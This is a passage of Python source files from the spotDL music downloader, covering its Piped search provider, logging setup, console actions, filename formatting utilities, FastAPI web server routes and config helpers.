**kwargs} if params.get("filter") is None: params["filter"] = "music_videos" response = self.session.get( "https://piped.video/search", params=params, headers=HEADERS, timeout=20, ) if response.status_code != 200: raise AudioProviderError( f"Failed to get results for {search_term} from Piped: {response.text}" ) search_results = response.json() # Simplify results results = [] for result in search_results["items"]: if result["type"] != "stream": continue isrc_result = ISRC_REGEX.search(search_term) results.append( Result( source="piped", url=f"https://piped.video{result['url']}", verified=kwargs.get("filter") == "music_songs", name=result["title"], duration=result["duration"], author=result["uploaderName"], result_id=result["url"].split("?v=")[1], artists=( (result["uploaderName"],) if kwargs.get("filter") == "music_songs" else None ), isrc_search=isrc_result is not None, search_query=search_term, ) ) return results def get_download_metadata(self, url: str, download: bool = False) -> Dict: """ Get metadata for a download using yt-dlp. ### Arguments - url: The url to get metadata for. ### Returns - A dictionary containing the metadata. """ url_id = url.split("?v=")[1] piped_response = requests.get( f"https://piped.video/streams/{url_id}", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) if piped_response.status_code != 200: raise AudioProviderError( f"Failed to get metadata for {url} from Piped: {piped_response.text}" ) piped_data = piped_response.json() yt_dlp_json = { "title": piped_data["title"], "id": url_id, "view_count": piped_data["views"], "extractor": "Generic", "formats": [], } for audio_stream in piped_data["audioStreams"]: yt_dlp_json["formats"].append( { "url": audio_stream["url"], "ext": "webm" if audio_stream["codec"] == "opus" else "m4a", "abr": audio_stream["quality"].split(" ")[0], "filesize": audio_stream["contentLength"], } ) return self.audio_handler.process_video_result(yt_dlp_json, download=download) File: spotdl/utils/logging.py """ Module for logging """ import logging from typing import Optional from rich import get_console from rich.console import ConsoleRenderable from rich.logging import RichHandler from rich.markup import escape from rich.text import Text from rich.theme import Theme from rich.traceback import install __all__ = [ "CRITICAL", "FATAL", "ERROR", "WARNING", "WARN", "INFO", "DEBUG", "MATCH", "NOTSET", "init_logging", "SpotdlFormatter", "LEVEL_TO_NAME", "NAME_TO_LEVEL", ] # https://github.com/python/cpython/blob/3.10/Lib/logging/__init__.py CRITICAL = 50 FATAL = CRITICAL ERROR = 40 WARNING = 30 WARN = WARNING INFO = 20 DEBUG = 10 MATCH = 5 NOTSET = 0 LEVEL_TO_NAME = { CRITICAL: "CRITICAL", ERROR: "ERROR", WARNING: "WARNING", INFO: "INFO", MATCH: "MATCH", DEBUG: "DEBUG", NOTSET: "NOTSET", } NAME_TO_LEVEL = { "CRITICAL": CRITICAL, "FATAL": FATAL, "ERROR": ERROR, "WARN": WARNING, "WARNING": WARNING, "INFO": INFO, "MATCH": MATCH, "DEBUG": DEBUG, "NOTSET": NOTSET, } THEME = Theme( { "bar.back": "grey23", "bar.complete": "rgb(165,66,129)", "bar.finished": "rgb(114,156,31)", "bar.pulse": "rgb(165,66,129)", "general": "green", "nonimportant": "rgb(40,100,40)", "progress.data.speed": "red", "progress.description": "none", "progress.download": "green", "progress.filesize": "green", "progress.filesize.total": "green", "progress.percentage": "green", "progress.remaining": "rgb(40,100,40)", "logging.level.debug": "blue", "logging.level.info": "green", "logging.level.warning": "yellow", "logging.level.error": "red", "logging.level.critical": "bold red", } ) class SpotdlFormatter(logging.Formatter): """ A custom logger for spotdl. """ def format(self, record: logging.LogRecord) -> str: """ Format a log record. """ result = escape(super().format(record)) msg = result if record.levelno == DEBUG: msg = f"[blue]{result}" if record.levelno == MATCH: msg = f"[magenta]{result}" if record.levelno == INFO: msg = f"[green]{result}" if record.levelno == WARNING: msg = f"[yellow]{result}" if record.levelno == ERROR: msg = f"[red]{result}" if record.levelno == CRITICAL: msg = f"[bold red]{result}" return msg class SpotdlHandler(RichHandler): """ A custom logging handler for spotdl. In this case, it's just a wrapper around the rich handler. To not highlight keywords in info messages """ def render_message( self, record: logging.LogRecord, message: str ) -> "ConsoleRenderable": """Render message text in to Text. ### Arguments - record: logging Record. - message: String containing log message. ### Returns - ConsoleRenderable: Renderable to display log message. """ use_markup = getattr(record, "markup", self.markup) message_text = Text.from_markup(message) if use_markup else Text(message) highlighter = getattr(record, "highlighter", self.highlighter) # Don't highlight info messages if highlighter and record.levelno != INFO: message_text = highlighter(message_text) if not hasattr(self, "keywords"): self.keywords = self.KEYWORDS # Don't highlight keywords in info messages if self.keywords and record.levelno != INFO: message_text.highlight_words(self.keywords, "logging.keyword") return message_text def init_logging(log_level: str, log_format: Optional[str] = None): """ Initialize logging for spotdl. ### Arguments - `console`: The console to use. - `log_level`: The log level to use. """ # Don't log too much logging.getLogger("requests").setLevel(logging.WARNING) logging.getLogger("urllib3").setLevel(logging.WARNING) logging.getLogger("spotipy").setLevel(logging.WARNING) logging.getLogger("asyncio").setLevel(logging.WARNING) logging.getLogger("syncedlyrics").setLevel(logging.WARNING) logging.getLogger("bandcamp_api").setLevel(logging.WARNING) logging.getLogger("beautifulsoup4").setLevel(logging.WARNING) logging.getLogger("pytube").setLevel(logging.ERROR) # Create console console = get_console() console.push_theme(THEME) # Add matching level loggers logging.addLevelName(MATCH, "MATCH") # Create a rich handler rich_handler = SpotdlHandler( show_time=log_level == "DEBUG", log_time_format="[%X]", omit_repeated_times=False, console=console, level=log_level, markup=True, show_path=log_level == "DEBUG", show_level=log_level == "DEBUG", rich_tracebacks=True, ) msg_format = "%(message)s" if log_format is None: if log_level == "DEBUG": msg_format = "%(threadName)s - %(message)s" else: msg_format = log_format # Add rich handler to spotdl logger rich_handler.setFormatter(SpotdlFormatter(msg_format)) # Create spotdl logger spotdl_logger = logging.getLogger("spotdl") # Setup spotdl logger spotdl_logger.setLevel(log_level) spotdl_logger.addHandler(rich_handler) # Install rich traceback handler install(show_locals=False, extra_lines=1, console=console) File: spotdl/utils/console.py """ Module for holding console related actions. """ import json import sys from spotdl.utils.config import DEFAULT_CONFIG, get_config_file from spotdl.utils.ffmpeg import download_ffmpeg as ffmpeg_download from spotdl.utils.ffmpeg import get_local_ffmpeg, is_ffmpeg_installed from spotdl.utils.github import check_for_updates as get_update_status __all__ = [ "is_frozen", "is_executable", "generate_initial_config", "generate_config", "check_for_updates", "download_ffmpeg", "ACTIONS", ] def is_frozen(): """ Check if the application is frozen. ### Returns - `True` if the application is frozen, `False` otherwise. """ return getattr(sys, "frozen", False) def is_executable(): """ Check if the application is an prebuilt executable. And has been launched with double click. ### Returns - `True` if the application is an prebuilt executable, `False` otherwise. """ return is_frozen() and len(sys.argv) == 1 def generate_initial_config(): """ Generate the initial config file if it doesn't exist. """ if get_config_file().is_file() is False: config_path = get_config_file() with open(config_path, "w", encoding="utf-8") as config_file: json.dump(DEFAULT_CONFIG, config_file, indent=4) def generate_config(): """ Generate the config file if it doesn't exist This is done before the argument parser so it doesn't requires `operation` and `query` to be passed. """ config_path = get_config_file() if config_path.exists(): overwrite_config = input("Config file already exists. Overwrite? (y/N): ") if overwrite_config.lower() != "y": print("Exiting...") return None with open(config_path, "w", encoding="utf-8") as config_file: json.dump(DEFAULT_CONFIG, config_file, indent=4) print(f"Config file generated at {config_path}") return None def check_for_updates(): """ Check for updates to the current version. """ version_message = get_update_status() print(version_message) def download_ffmpeg(): """ Handle ffmpeg download process and print the result. """ if get_local_ffmpeg() is not None or is_ffmpeg_installed(): overwrite_ffmpeg = input( "FFmpeg is already installed. Do you want to overwrite it? (y/N): " ) if overwrite_ffmpeg.lower() == "y": local_ffmpeg = ffmpeg_download() if local_ffmpeg.is_file(): print(f"FFmpeg successfully downloaded to {local_ffmpeg.absolute()}") else: print("FFmpeg download failed") else: print("Downloading FFmpeg...") download_path = ffmpeg_download() if download_path.is_file(): print(f"FFmpeg successfully downloaded to {download_path.absolute()}") else: print("FFmpeg download failed") ACTIONS = { "--generate-config": generate_config, "--check-for-updates": check_for_updates, "--download-ffmpeg": download_ffmpeg, } File: spotdl/utils/formatter.py """ Module for formatting songs into strings. Contains functions to create search queries and song titles and file names. """ import copy import logging import re from functools import lru_cache from pathlib import Path from typing import Any, Dict, List, Optional from unicodedata import normalize import pykakasi from rapidfuzz import fuzz from slugify import slugify as py_slugify from yt_dlp.options import create_parser from yt_dlp.options import optparse as yt_dlp_optparse from yt_dlp.utils import sanitize_filename from spotdl.types.song import Song __all__ = [ "VARS", "JAP_REGEX", "DISALLOWED_REGEX", "create_song_title", "sanitize_string", "slugify", "format_query", "create_search_query", "create_file_name", "parse_duration", "to_ms", "restrict_filename", "ratio", "smart_split", "create_path_object", "args_to_ytdlp_options", ] VARS = [ "{title}", "{artists}", "{artist}", "{album}", "{album-artist}", "{genre}", "{disc-number}", "{disc-count}", "{duration}", "{year}", "{original-date}", "{track-number}", "{tracks-count}", "{isrc}", "{track-id}", "{publisher}", "{list-length}", "{list-position}", "{list-name}", "{output-ext}", ] KKS = pykakasi.kakasi() JAP_REGEX = re.compile( "[\u3000-\u303f\u3040-\u309f\u30a0-\u30ff\uff00-\uff9f\u4e00-\u9faf\u3400-\u4dbf]" ) DISALLOWED_REGEX = re.compile(r"[^-a-zA-Z0-9\!\@\$]+") YT_DLP_PARSER = create_parser() logger = logging.getLogger(__name__) def create_song_title(song_name: str, song_artists: List[str]) -> str: """ Create the song title. ### Arguments - song_name: the name of the song - song_artists: the list of artists of the song ### Returns - the song title ### Notes - Example: "Artist1, Artist2 - Song Name" """ joined_artists = ", ".join(song_artists) if len(song_artists) >= 1: return f"{joined_artists} - {song_name}" return song_name def sanitize_string(string: str) -> str: """ Sanitize the filename to be used in the file system. ### Arguments - string: the string to sanitize ### Returns - the sanitized string """ output = string # this is windows specific (disallowed chars) output = "".join(char for char in output if char not in "/?\\*|<>") # double quotes (") and semi-colons (:) are also disallowed characters but we would # like to retain their equivalents, so they aren't removed in the prior loop output = output.replace('"', "'").replace(":", "-") return output @lru_cache() def slugify(string: str) -> str: """ Slugify the string. ### Arguments - string: the string to slugify ### Returns - the slugified string """ # Replace ambiguous characters if not JAP_REGEX.search(string): # If string doesn't have japanese characters # return early return py_slugify(string, regex_pattern=DISALLOWED_REGEX.pattern) # Workaround for japanese characters # because slugify incorrectly converts them # to latin characters normal_slug = py_slugify( string, regex_pattern=JAP_REGEX.pattern, ) results = KKS.convert(normal_slug) result = "" for index, item in enumerate(results): result += item["hepburn"] if not ( item["kana"] == item["hepburn"] or item["kana"] == item["hepburn"] or ( item == results[-1] or results[index + 1]["kana"] == results[index + 1]["hepburn"] ) ): result += "-" return py_slugify(result, regex_pattern=DISALLOWED_REGEX.pattern) def format_query( song: Song, template: str, santitize: bool, file_extension: Optional[str] = None, short: bool = False, ) -> str: """ Replace template variables with the actual values. ### Arguments - song: the song object - template: the template string - santitize: whether to sanitize the string - file_extension: the file extension to use - short: whether to use the short version of the template ### Returns - the formatted string """ if "{output-ext}" in template and file_extension is None: raise ValueError("file_extension is None, but template contains {output-ext}") for key, val in [ ("{list-length}", song.list_length), ("{list-position}", song.list_position), ("{list-name}", song.list_name), ]: if not (key in template and val is None): continue logger.warning( "Template contains %s, but it's value is None. Replacing with empty string.", key, ) template = template.replace(key, "") template = template.replace(r"//", r"/") # If template has only {output-ext}, fix it if template in ["/.{output-ext}", ".{output-ext}"]: template = "{artists} - {title}.{output-ext}" # Remove artists from the list that are already in the title if short: artists = [ artist for artist in song.artists if slugify(artist) not in slugify(song.name) ] # Add the main artist again to the list if len(artists) == 0 or artists[0] != song.artists[0]: artists.insert(0, song.artists[0]) else: artists = song.artists artists_str = ", ".join(artists) # the code below is valid, song_list is actually checked for None formats = { "{title}": song.name, "{artists}": song.artists[0] if short is True else artists_str, "{artist}": song.artists[0], "{album}": song.album_name, "{album-artist}": song.album_artist, "{genre}": song.genres[0] if song.genres else "", "{disc-number}": song.disc_number, "{disc-count}": song.disc_count, "{duration}": song.duration, "{year}": song.year, "{original-date}": song.date, "{track-number}": f"{int(song.track_number):02d}" if song.track_number else "", "{tracks-count}": song.tracks_count, "{isrc}": song.isrc, "{track-id}": song.song_id, "{publisher}": song.publisher, "{output-ext}": file_extension, "{list-name}": song.list_name, "{list-position}": str(song.list_position).zfill(len(str(song.list_length))), "{list-length}": song.list_length, } if santitize: # sanitize the values in formats dict for key, value in formats.items(): if value is None: continue formats[key] = sanitize_string(str(value)) # Replace all the keys with the values for key, value in formats.items(): template = template.replace(key, str(value)) return template def create_search_query( song: Song, template: str, santitize: bool, file_extension: Optional[str] = None, short: bool = False, ) -> str: """ Create the search query for the song. ### Arguments - song: the song object - template: the template string - santitize: whether to sanitize the string - file_extension: the file extension to use - short: whether to use the short version of the template ### Returns - the formatted string """ # If template does not contain any of the keys, # append {artist} - {title} at the beginning of the template if not any(key in template for key in VARS): template = "{artist} - {title}" + template return format_query(song, template, santitize, file_extension, short=short) def create_file_name( song: Song, template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, file_name_length: Optional[int] = None, ) -> Path: """ Create the file name for the song, by replacing template variables with the actual values. ### Arguments - song: the song object - template: the template string - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - file_name_length: the maximum length of the file name ### Returns - the formatted string as a Path object """ temp_song = copy.deepcopy(song) # If template does not contain any of the keys, # append {artists} - {title}.{output-ext} to it if not any(key in template for key in VARS) and template != "": template += "/{artists} - {title}.{output-ext}" if template == "": template = "{artists} - {title}.{output-ext}" # If template ends with a slash. Does not have a file name with extension # at the end of the template, append {artists} - {title}.{output-ext} to it if template.endswith("/") or template.endswith(r"\\") or template.endswith("\\\\"): template += "/{artists} - {title}.{output-ext}" # If template does not end with {output-ext}, append it to the end of the template if not template.endswith(".{output-ext}"): template += ".{output-ext}" formatted_string = format_query( song=song, template=template, santitize=True, file_extension=file_extension, short=short, ) file = create_path_object(formatted_string) length_limit = file_name_length or 255 # Check if the file name length is greater than the limit if len(file.name) < length_limit: # Restrict the filename if needed if restrict and restrict != "none": return restrict_filename(file, restrict == "strict") return file if short is False: return create_file_name( song, template, file_extension, restrict=restrict, short=True, file_name_length=length_limit, ) non_template_chars = re.findall(r"(?<!{)[^{}]+(?![^{}]*})", template) half_length = int((length_limit * 0.50) - (len("".join(non_template_chars)) / 2)) # Path template is already short, but we still can't create a file # so we reduce it even further is_long_artist = len(temp_song.artist) > half_length is_long_title = len(temp_song.name) > half_length path_separator = "/" if "/" in template else "\\" name_template_parts = template.rsplit(path_separator, 1) name_template = ( name_template_parts[1] if len(name_template_parts) > 1 else name_template_parts[0] ) if is_long_artist: logger.warning( "%s: Song artist is too long. Using only part of song artist.", temp_song.display_name, ) temp_song.artist = smart_split(temp_song.artist, half_length, None) temp_song.artists = [temp_song.artist] if is_long_title: logger.warning( "%s: File name is too long. Using only part of the song title.", temp_song.display_name, ) temp_song.name = smart_split(temp_song.name, half_length, None) new_file = create_path_object( format_query( song=temp_song, template=name_template, santitize=True, file_extension=file_extension, short=short, ) ) if len(new_file.name) > length_limit: logger.warning( "File name is still too long. " "Using default file name with shortened artist and title." ) if template == "{artist} - {title}.{output-ext}": raise ValueError( "File name is still too long, " "but the template is already short. " "Please try other template, " "increase the file name length limit." ) return create_file_name( temp_song, "{artist} - {title}.{output-ext}", file_extension, restrict=restrict, short=True, file_name_length=length_limit, ) return new_file def parse_duration(duration: Optional[str]) -> float: """ Convert string value of time (duration: "25:36:59") to a float value of seconds (92219.0) ### Arguments - duration: the string value of time ### Returns - the float value of seconds """ if duration is None: return 0.0 try: # {(1, "s"), (60, "m"), (3600, "h")} mapped_increments = zip([1, 60, 3600], reversed(duration.split(":"))) seconds = sum(multiplier * int(time) for multiplier, time in mapped_increments) return float(seconds) # This usually occurs when the wrong string is mistaken for the duration except (ValueError, TypeError, AttributeError): return 0.0 def to_ms( string: Optional[str] = None, precision: Optional[int] = None, **kwargs ) -> float: """ Convert a string to milliseconds. ### Arguments - string: the string to convert - precision: the number of decimals to round to - kwargs: the keyword args to convert ### Returns - the milliseconds ### Notes - You can either pass a string, - or a set of keyword args ("hour", "min", "sec", "ms") to convert. - If "precision" is set, the result is rounded to the number of decimals given. - From: https://gist.github.com/Hellowlol/5f8545e999259b4371c91ac223409209 """ if string: hour = int(string[0:2]) minute = int(string[3:5]) sec = int(string[6:8]) milliseconds = int(string[10:11]) else: hour = int(kwargs.get("hour", 0)) minute = int(kwargs.get("min", 0)) sec = int(kwargs.get("sec", 0)) milliseconds = int(kwargs.get("ms", 0)) result = ( (hour * 60 * 60 * 1000) + (minute * 60 * 1000) + (sec * 1000) + milliseconds ) if precision and isinstance(precision, int): return round(result, precision) return result def restrict_filename(pathobj: Path, strict: bool = True) -> Path: """ Sanitizes the filename part of a Path object. Returns modified object. ### Arguments - pathobj: the Path object to sanitize - strict: whether sanitization should be strict ### Returns - the modified Path object ### Notes - Based on the `sanitize_filename` function from yt-dlp """ if strict: result = sanitize_filename(pathobj.name, True, False) # type: ignore result = result.replace("_-_", "-") else: result = ( normalize("NFKD", pathobj.name).encode("ascii", "ignore").decode("utf-8") ) if not result: result = "_" return pathobj.with_name(result) @lru_cache() def ratio(string1: str, string2: str) -> float: """ Wrapper for fuzz.ratio with lru_cache ### Arguments - string1: the first string - string2: the second string ### Returns - the ratio """ return fuzz.ratio(string1, string2) def smart_split( string: str, max_length: int, separators: Optional[List[str]] = None ) -> str: """ Split a string into a list of strings with a maximum length of max_length. Stops at the first separator that produces a string with a length less than max_length. ### Arguments - string: the string to split - max_length: the maximum length of string - separators: the separators to split the string with ### Returns - the new string """ if separators is None: separators = ["-", ",", " ", ""] for separator in separators: parts = string.split(separator if separator != "" else None) new_string = separator.join(parts[:1]) for part in parts[1:]: if len(new_string) + len(separator) + len(part) > max_length: break new_string += separator + part if len(new_string) <= max_length: return new_string return string[:max_length] def create_path_object(string: str) -> Path: """ Create a Path object from a string. Sanitizes the filename part of the Path object. ### Arguments - string: the string to convert ### Returns - the Path object """ # Parse template as Path object file = Path(string) santitized_parts = [] for part in file.parts: match = re.search(r"[^\.*](.*)[^\.*$]", part) if match and part != ".spotdl": santitized_parts.append(match.group(0)) else: santitized_parts.append(part) # Join the parts of the path return Path(*santitized_parts) def args_to_ytdlp_options( argument_list: List[str], defaults: Optional[Dict[str, Any]] = None ) -> Dict[str, Any]: """ Convert a list of arguments to a dictionary of options. ### Arguments - argument_list: the list of arguments - defaults: the default options ### Returns - the dictionary of options """ new_args = YT_DLP_PARSER.parse_args(argument_list, yt_dlp_optparse.Values(defaults)) return vars(new_args[0]) File: spotdl/utils/web.py """ Module which contains the web server related function FastAPI routes/classes etc. """ import argparse import asyncio import logging import mimetypes import os import shutil from argparse import Namespace from pathlib import Path from typing import Any, Dict, List, Optional, Union from fastapi import ( APIRouter, Depends, FastAPI, HTTPException, Query, Response, WebSocket, WebSocketDisconnect, ) from fastapi.responses import FileResponse from fastapi.staticfiles import StaticFiles from starlette.types import Scope from uvicorn import Server from spotdl._version import __version__ from spotdl.download.downloader import Downloader from spotdl.download.progress_handler import ProgressHandler, SongTracker from spotdl.types.album import Album from spotdl.types.artist import Artist from spotdl.types.options import ( DownloaderOptionalOptions, DownloaderOptions, WebOptions, ) from spotdl.types.playlist import Playlist from spotdl.types.song import Song from spotdl.utils.arguments import create_parser from spotdl.utils.config import ( DOWNLOADER_OPTIONS, create_settings_type, get_spotdl_path, ) from spotdl.utils.github import RateLimitError, get_latest_version, get_status from spotdl.utils.search import get_search_results __all__ = [ "ALLOWED_ORIGINS", "SPAStaticFiles", "Client", "ApplicationState", "router", "app_state", "get_current_state", "get_client", "websocket_endpoint", "song_from_url", "query_search", "download_url", "download_file", "get_settings", "update_settings", "fix_mime_types", ] ALLOWED_ORIGINS = [ "http://localhost:8800", "http://127.0.0.1:8800", "https://localhost:8800", "https://127.0.0.1:8800", ] class SPAStaticFiles(StaticFiles): """ Override the static files to serve the index.html and other assets. """ async def get_response(self, path: str, scope: Scope) -> Response: """ Serve static files from the SPA. ### Arguments - path: The path to the file. - scope: The scope of the request. ### Returns - returns the response. """ response = await super().get_response(path, scope) if response.status_code == 404: response = await super().get_response(".", scope) response.headers.setdefault( "Cache-Control", "max-age=0, no-cache, no-store, , must-revalidate" ) response.headers.setdefault("Pragma", "no-cache") response.headers.setdefault("Expires", "0") return response class Client: """ Holds the client's state. """ def __init__( self, websocket: WebSocket, client_id: str, ): """ Initialize the WebSocket handler. ### Arguments - websocket: The WebSocket instance. - client_id: The client's ID. - downloader_settings: The downloader settings. """ self.downloader_settings = DownloaderOptions( **create_settings_type( Namespace(config=False), dict(app_state.downloader_settings), DOWNLOADER_OPTIONS, ) # type: ignore ) self.websocket = websocket self.client_id = client_id self.downloader = Downloader( settings=self.downloader_settings, loop=app_state.loop ) self.downloader.progress_handler.web_ui = True async def connect(self): """ Called when a new client connects to the websocket. """ await self.websocket.accept() # Add the connection to the list of connections app_state.clients[self.client_id] = self app_state.logger.info("Client %s connected", self.client_id) async def send_update(self, update: Dict[str, Any]): """ Send an update to the client. ### Arguments - update: The update to send. """ await self.websocket.send_json(update) def song_update(self, progress_handler: SongTracker, message: str): """ Called when a song updates. ### Arguments - progress_handler: The progress handler. - message: The message to send. """ update_message = { "song": progress_handler.song.json, "progress": progress_handler.progress, "message": message, } asyncio.run_coroutine_threadsafe( self.send_update(update_message), app_state.loop ) @classmethod def get_instance(cls, client_id: str) -> Optional["Client"]: """ Get the WebSocket instance for a client. ### Arguments - client_id: The client's ID. ### Returns - returns the WebSocket instance. """ instance = app_state.clients.get(client_id) if instance: return instance app_state.logger.error("Client %s not found", client_id) return None class ApplicationState: """ Class that holds the application state. """ api: FastAPI server: Server loop: asyncio.AbstractEventLoop web_settings: WebOptions downloader_settings: DownloaderOptions clients: Dict[str, Client] = {} logger: logging.Logger router = APIRouter() app_state: ApplicationState = ApplicationState() def get_current_state() -> ApplicationState: """ Get the current state of the application. ### Returns - returns the application state. """ return app_state def get_client(client_id: Union[str, None] = Query(default=None)) -> Client: """ Get the client's state. ### Arguments - client_id: The client's ID. ### Returns - returns the client's state. """ if client_id is None: raise HTTPException(status_code=400, detail="client_id is required") instance = Client.get_instance(client_id) if instance is None: raise HTTPException(status_code=404, detail="client not found") return instance @router.websocket("/api/ws") async def websocket_endpoint(websocket: WebSocket, client_id: str): """ Websocket endpoint. ### Arguments - websocket: The WebSocket instance. """ await Client(websocket, client_id).connect() try: while True: await websocket.receive_json() except WebSocketDisconnect: app_state.clients.pop(client_id, None) if ( len(app_state.clients) == 0 and app_state.web_settings["keep_alive"] is False ): app_state.logger.debug( "No active connections, waiting 1s before shutting down" ) await asyncio.sleep(1) # Wait 1 second before shutting down # This is to prevent the server from shutting down when a client # disconnects and reconnects quickly (e.g. when refreshing the page) if len(app_state.clients) == 0: # Perform a clean exit app_state.logger.info("Shutting down server, no active connections") app_state.server.force_exit = True app_state.server.should_exit = True await app_state.server.shutdown() # Deprecated @router.get("/api/song/url", response_model=None) def song_from_url(url: str) -> Song: """ Search for a song on spotify using url. ### Arguments - url: The url to search. ### Returns - returns the first result as a Song object. """ return Song.from_url(url) @router.get("/api/url", response_model=None) def songs_from_url(url: str) -> List[Song]: """ Search for a song, playlist, artist or album on spotify using url. ### Arguments - url: The url to search. ### Returns - returns a list with Song objects to be downloaded. """ if "playlist" in url: playlist = Playlist.from_url(url) return list(map(Song.from_url, playlist.urls)) if "album" in url: album = Album.from_url(url) return list(map(Song.from_url, album.urls)) if "artist" in url: artist = Artist.from_url(url) return list(map(Song.from_url, artist.urls)) return [Song.from_url(url)] @router.get("/api/version", response_model=None) def version() -> str: """ Get the current version This method is created to ensure backward compatibility of the web app, as the web app is updated with the latest regardless of the backend version ### Returns - returns the version of the app """ return __version__ @router.on_event("shutdown") async def shutdown_event(): """ Called when the server is shutting down. """ if ( not app_state.web_settings["keep_sessions"] and not app_state.web_settings["web_use_output_dir"] ): app_state.logger.info("Removing sessions directories") sessions_dir = Path(get_spotdl_path(), "web/sessions") if sessions_dir.exists(): shutil.rmtree(sessions_dir) @router.get("/api/songs/search", response_model=None) def query_search(query: str) -> List[Song]: """ Parse search term and return list of Song objects. ### Arguments - query: The query to parse. ### Returns - returns a list of Song objects. """ return get_search_results(query) @router.post("/api/download/url") async def download_url( url: str, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ) -> Optional[str]: """ Download songs using Song url. ### Arguments - url: The url to download. ### Returns - returns the file path if the song was downloaded. """ if state.web_settings.get("web_use_output_dir", False): client.downloader.settings["output"] = client.downloader_settings["output"] else: client.downloader.settings["output"] = str( (get_spotdl_path() / f"web/sessions/{client.client_id}").absolute() ) client.downloader.progress_handler = ProgressHandler( simple_tui=True, update_callback=client.song_update, ) try: # Fetch song metadata song = Song.from_url(url) # Download Song _, path = await client.downloader.pool_download(song) if path is None: state.logger.error(f"Failure downloading {song.name}") raise HTTPException( status_code=500, detail=f"Error downloading: {song.name}" ) return str(path.absolute()) except Exception as exception: state.logger.error(f"Error downloading! {exception}") raise HTTPException( status_code=500, detail=f"Error downloading: {exception}" ) from exception @router.get("/api/download/file") async def download_file( file: str, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ): """ Download file using path. ### Arguments - file: The file path. - client: The client's state. ### Returns - returns the file response, filename specified to return as attachment. """ expected_path = str((get_spotdl_path() / "web/sessions").absolute()) if state.web_settings.get("web_use_output_dir", False): expected_path = str( Path(client.downloader_settings["output"].split("{", 1)[0]).absolute() ) if (not file.endswith(client.downloader_settings["format"])) or ( not file.startswith(expected_path) ): raise HTTPException(status_code=400, detail="Invalid download path.") return FileResponse( file, filename=os.path.basename(file), ) @router.get("/api/settings") def get_settings( client: Client = Depends(get_client), ) -> DownloaderOptions: """ Get client settings. ### Arguments - client: The client's state. ### Returns - returns the settings. """ return client.downloader_settings @router.post("/api/settings/update") def update_settings( settings: DownloaderOptionalOptions, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ) -> DownloaderOptions: """ Update client settings, and re-initialize downloader. ### Arguments - settings: The settings to change. - client: The client's state. - state: The application state. ### Returns - returns True if the settings were changed. """ # Create shallow copy of settings settings_cpy = client.downloader_settings.copy() # Update settings with new settings that are not None settings_cpy.update({k: v for k, v in settings.items() if v is not None}) # type: ignore state.logger.info(f"Applying settings: {settings_cpy}") new_settings = DownloaderOptions(**settings_cpy) # type: ignore # Re-initialize downloader client.downloader_settings = new_settings client.downloader = Downloader( new_settings, loop=state.loop, ) return new_settings @router.get("/api/check_update") def check_update() -> bool: """ Check for update. ### Returns - returns True if there is an update. """ try: _, ahead, _ = get_status(__version__, "master") if ahead > 0: return True except RuntimeError: latest_version = get_latest_version() latest_tuple = tuple(latest_version.replace("v", "").split(".")) current_tuple = tuple(__version__.split(".")) if latest_tuple > current_tuple: return True except RateLimitError: return False return False @router.get("/api/options_model") def get_options() -> Dict[str, Any]: """ Get options model (possible settings). ### Returns - returns the options. """ parser = create_parser() # Forbidden actions forbidden_actions = [ "help", "operation", "version", "config", "user_auth", "client_id", "client_secret", "auth_token", "cache_path", "no_cache", "cookie_file", "ffmpeg", "archive", "host", "port", "keep_alive", "enable_tls", "key_file", "cert_file", "ca_file", "allowed_origins", "web_use_output_dir", "keep_sessions", "log_level", "simple_tui", "headless", "download_ffmpeg", "generate_config", "check_for_updates", "profile", "version", ] options = {} for action in parser._actions: # pylint: disable=protected-access if action.dest in forbidden_actions: continue default = app_state.downloader_settings.get(action.dest, None) choices = list(action.choices) if action.choices else None type_name = "" if action.type is not None: if hasattr(action.type, "__objclass__"): type_name: str = action.type.__objclass__.__name__ # type: ignore else: type_name: str = action.type.__name__ # type: ignore if isinstance( action, argparse._StoreConstAction # pylint: disable=protected-access ): type_name = "bool" if choices is not None and action.nargs == "*": type_name = "list" options[action.dest] = { "type": type_name, "choices": choices, "default": default, "help": action.help, } return options def fix_mime_types(): """Fix incorrect entries in the `mimetypes` registry. On Windows, the Python standard library's `mimetypes` reads in mappings from file extension to MIME type from the Windows registry. Other applications can and do write incorrect values to this registry, which causes `mimetypes.guess_type` to return incorrect values, which causes spotDL to fail to render on the frontend. This method hard-codes the correct mappings for certain MIME types that are known to be either used by TensorBoard or problematic in general. """ # Known to be problematic when Visual Studio is installed: # <https://github.com/tensorflow/tensorboard/issues/3120> # https://github.com/spotDL/spotify-downloader/issues/1540 mimetypes.add_type("application/javascript", ".js") # Not known to be problematic, but used by spotDL: mimetypes.add_type("text/css", ".css") mimetypes.add_type("image/svg+xml", ".svg") mimetypes.add_type("text/html", ".html") File: spotdl/utils/config.py """ Module related to managing reading and writing to the config file. Default config - spotdl.utils.config.DEFAULT_CONFIG """ import json import logging import os import platform from argparse import Namespace from pathlib import Path from typing import Any, Dict, Tuple, Union import platformdirs from spotdl.types.options import ( DownloaderOptions, SpotDLOptions, SpotifyOptions, WebOptions, ) __all__ = [ "ConfigError", "get_spotdl_path", "get_config_file", "get_cache_path", "get_temp_path", "get_errors_path", "get_web_ui_path", "get_config", "create_settings_type", "create_settings", "SPOTIFY_OPTIONS", "DOWNLOADER_OPTIONS", "WEB_OPTIONS", "DEFAULT_CONFIG", ] logger = logging.getLogger(__name__) class ConfigError(Exception): """ Base class for all exceptions related to config. """ def get_spotdl_path() -> Path: """ Get the path to the spotdl folder. ### Returns - The path to the spotdl folder. ### Notes - If the spotdl directory does not exist, it will be created. """ # Check if os is linux if platform.system() == "Linux": # if platform is linux, and XDG DATA HOME spotdl folder exists, use it user_data_dir = Path(platformdirs.user_data_dir("spotdl", "spotDL")) if user_data_dir.exists(): return user_data_dir spotdl_path = Path(os.path.expanduser("~"), ".spotdl") if not spotdl_path.exists(): os.mkdir(spotdl_path) return spotdl_path def get_config_file() -> Path: """ Get config file path ### Returns - The path to the config file. """ return get_spotdl_path() / "config.json" def get_cache_path() -> Path: """ Get the path to the cache folder. ### Returns - The path to the spotipy cache file. """ return get_spotdl_path() / ".spotipy" def get_spotify_cache_path() -> Path: """ Get the path to the spotify cache folder. ### Returns - The path to the spotipy cache file. """ return get_spotdl_path() / ".spotify_cache" def 